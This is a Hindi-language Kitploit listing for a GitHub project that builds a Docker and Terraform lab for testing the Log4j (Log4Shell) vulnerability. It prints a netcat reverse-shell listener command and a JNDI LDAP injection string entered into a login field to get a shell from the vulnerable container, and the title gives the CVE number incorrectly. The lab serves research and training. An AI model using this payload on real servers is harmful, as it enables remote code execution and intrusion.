Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4jtest — # CVE-2021-44428 का त्वरित परीक्षण सेटअप करने के लिए Terraform और Docker संसाधन | Kitploit
उपकरण/GitHubGitHub/z3bul0n/log4jtest
क्लाउड इन्फ्रास्ट्रक्चर सुरक्षाकंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubz3bul0n/log4jtest

log4jtest

# CVE-2021-44428 का त्वरित परीक्षण सेटअप करने के लिए Terraform और Docker संसाधन

रिपॉजिटरी देखें
174 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

परिचय

यह रिपॉजिटरी Docker और Hashicorp Terraform का उपयोग करके log4j कमजोरी का त्वरित परीक्षण करने के लिए सेट की गई है। इस परीक्षण के सभी घटक Docker नेटवर्क पर Docker कंटेनरों में चलेंगे, जिन्हें 'host.docker.internal' के माध्यम से एक्सेस किया जा सकता है।

श्रेय / अस्वीकरण

यह परीक्षण वातावरण Raxis के एक बेहतरीन ब्लॉग पोस्ट से लिया गया है: (https://raxis.com/blog/log4j-exploit)

कमजोर एप्लिकेशन और एक्सप्लॉइट कोड cyberxml (https://github.com/cyberxml/log4j-poc) से आया है।

मैंने केवल वातावरण को कोडबद्ध किया है ताकि इस स्वादिष्ट एक्सप्लॉइट को आसानी से चालू करके परीक्षण किया जा सके।

मैं इस रिपॉजिटरी में मौजूद सामग्री के उपयोग से होने वाले प्रतिकूल प्रभावों या दुर्भावनापूर्ण कार्यों के लिए कोई जिम्मेदारी नहीं लेता। पूर्ण विराम। यह तय करना आप पर है कि ये सामग्रियाँ भरोसेमंद हैं या नहीं, और इसी तरह इस जानकारी का नैतिक रूप से उपयोग करना भी आपकी जिम्मेदारी है। मैं केवल इन चीज़ों को पोस्ट करता हूँ ताकि शोधकर्ता, छात्र और सुरक्षा पेशेवर जल्दी से एक वातावरण बना सकें और स्वयं एक्सप्लॉइट का परीक्षण कर सकें। Seacrest out।

पूर्वापेक्षाएँ

  • Docker Desktop (https://www.docker.com/)
  • Hashicorp Terraform (https://www.terraform.io/)

सेटअप

  1. इस रिपॉजिटरी को क्लोन करें
  2. प्रोजेक्ट निर्देशिका में 'terraform init' चलाएँ
  3. Docker डेमॉन प्रारंभ करें
  • प्रोजेक्ट के सभी कंटेनर इमेज बनाने के लिए 'docker-build.sh' बैश स्क्रिप्ट चलाएँ।
  • प्रोजेक्ट के सभी कंटेनर बनाने के लिए 'terraform apply' चलाएँ।
  • एक्सप्लॉइटेशन

    1. 'docker exec -it netcat /bin/bash' या इसी तरह की किसी कमांड का उपयोग करके log4j_netcat कंटेनर में शेल करें। स्थापित होने के बाद आपको पीड़ित सर्वर से अपना शेल कनेक्शन यहीं प्राप्त होगा।

    2. log4j_netcat कंटेनर के भीतर अपने सत्र में, लिसनर प्रारंभ करने के लिए निम्नलिखित कमांड दर्ज करें:

    root@kitploit:~
    nc -lv -s 0.0.0.0 -p 9001
    
    1. अपने ब्राउज़र में, http://host.docker.internal:8080/log4shell/ पर जाएँ।

    2. 'Username' फ़ील्ड में निम्नलिखित दर्ज करें, साथ ही 'Password' फ़ील्ड में जो चाहें वह दर्ज करें:

    root@kitploit:~
    ${jndi:ldap://host.docker.internal:1389/a}
    
    1. log4j_netcat कंटेनर शेल पर लौटें और देखें कि आप पीड़ित सर्वर से जुड़ गए हैं।

    2. जाइए और तहलका मचाइए!

    टूल डाउनलोड करें